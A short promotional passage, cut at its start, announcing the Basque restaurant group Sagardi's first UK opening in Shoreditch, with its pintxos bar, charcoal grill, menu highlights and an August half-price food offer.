country specialists Sagardi, led by Iñaki Viñaspre, are to open their first UK restaurant in Shoreditch this July adding to their list of establishments in Spain, Mexico and Argentina. Celebrating the best Basque food and drink, the restaurant will be split into two areas…the Pintxos bar will serve traditional snacks alongside regional ciders, beers & wines and the main space will be home to a central charcoal grill and  street-facing butchers, showcasing impressive sides of Galician beef. With produce being flown in from San Sebastian, the menu features treats like fried Txistorra sausage, Biskay black pudding, Almalabra red tuna, cider house style salt cod and Txuleton steak.

And if that didn’t sound good enough, they are opening for lunch and dinner with 50% OFF all food for the whole of August – WAHOOOO.
